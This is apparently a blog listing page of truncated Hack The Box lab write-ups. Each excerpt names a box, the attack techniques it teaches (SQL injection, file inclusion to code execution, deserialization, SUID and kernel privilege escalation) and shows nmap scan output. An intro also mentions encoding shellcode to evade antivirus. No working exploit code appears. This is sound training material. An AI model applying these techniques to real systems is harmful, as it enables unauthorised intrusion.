Sign in

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

What is Encoder?

In computer systems, an encoder can be used for various purposes. For example, Base64 encodes binary data into an ASCII characters which are known to pretty much every computer system. Or one may use an encoder to mangle their own code to potentially bypass a security product such as AV. Today, I will demonstrate a simple custom encoding scheme for a x86 shellcode.

Encoding Scheme


Help was an easy difficulty Linux box. Good learning path for:

  • GraphQL Query Enumeration
  • Unauthenticated PHP File Upload (HelpDeskZ)
  • Linux Kernel Exploit

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.121Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-13 00:14 EDT Nmap scan report for 10.10.10.121 Host is up (0.081s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA) | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA) |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page…

Json was a medium difficulty Windows box. Good learning path for:

  • JSON-based deserialization (Bearer: header)
  • JuicyPotato Exploit (SeImpersonatePrivilege)

Initial Recon

Nmap

# nmap -Pn --open -sC -sV -p- -T4 10.10.10.158PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd | ftp-syst: |_ SYST: UNIX emulated by FileZilla 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: Json HTB 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service…


Unattended was a medium difficulty Linux box. Good learning path for:

  • Nginx off-by-slash Attack
  • SQLi (boolean-based Blind)
  • SQLi → LFI (Abusing Existing <?php include(); ?>)
  • LFI → PHP Session Poisoning → RCE
  • Socket TTY Shell
  • Linux initrd Exploit

Initial Recon

Nmap

#  nmap -Pn --open -T4 -sV -sC -p- 10.10.10.126Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-12 12:33 EDT Nmap scan report for 10.10.10.126 Host is up (0.078s latency). Not shown: 65533 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 80/tcp open http nginx 1.10.3 |_http-server-header: nginx/1.10.3 |_http-title: Site doesn't have a title…


Mango was a medium difficulty Linux box. Good learning path for:

  • MongoDB — NoSQL Exploit to Brute-force the passwords
  • Permissive SUID Binary Abuse (GTFobins — JJS Exploit)

Initial Recon

Nmap

# nmap -Pn — open -sC -sV -p- -T4 10.10.10.162PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA) | 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA) |_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Mango | Search Base | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN…


Zipper is a hard difficulty Linux box. Good learning path for:

  • Zabbix-cli Access
  • Zabbix RCE Exploit
  • SUID Binary Hijack

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.108Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-11 21:32 EDT
Nmap scan report for 10.10.10.108
Host is up (0.082s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 59:20:a3:a0:98:f2:a7:14:1e:08:e0:9b:81:72:99:0e (RSA)
| 256 aa:fe:25:f8:21:24:7c:fc:b5:4b:5f:05:24:69:4c:76 (ECDSA)
|_ 256 89:28:37:e2:b6:cc:d5:80:38:1f:b2:6a:3a:c3:a1:84 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 …

Falafel is a hard difficulty Linux box. Really good learning path for:

  • SQLi (Boolean-based Blind)
  • PHP Type Juggling Attack (Loose Comparison Weakness / Magic Hashes)
  • Filename Truncation Attack to Upload a PHP Script
  • Linux Framebuffer (video group privilege)
  • Linux File System Debug (disk group privilege)

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.73Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-10 20:40 EDT Nmap scan report for 10.10.10.73 Host is up (0.081s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)…


Blocky is an easy difficulty Linux box. Good learning path for:

  • Java Decompiler (JD-GUI)

Initial Recon

Nmap

# nmap -Pn --open -T4 -sV -sC -p- 10.10.10.37Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-10 20:04 EDT
Nmap scan report for 10.10.10.37
Host is up (0.078s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft &#8211; Under Construction! …

Celestial is a medium difficulty Linux box. Good learning path for:

  • NodeJS Deserialization Attack
  • CronJob Hijack for Privilege Escalation

Initial Recon

Nmap

# nmap -Pn --open -p- -T4 -sV -sC 10.10.10.85Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-10 16:26 EDT
Nmap scan report for 10.10.10.85
Host is up (0.082s latency).
Not shown: 64257 closed ports, 1277 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
  • HTTP (3000/TCP) — NodeJS web application. But it rendered “404”

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store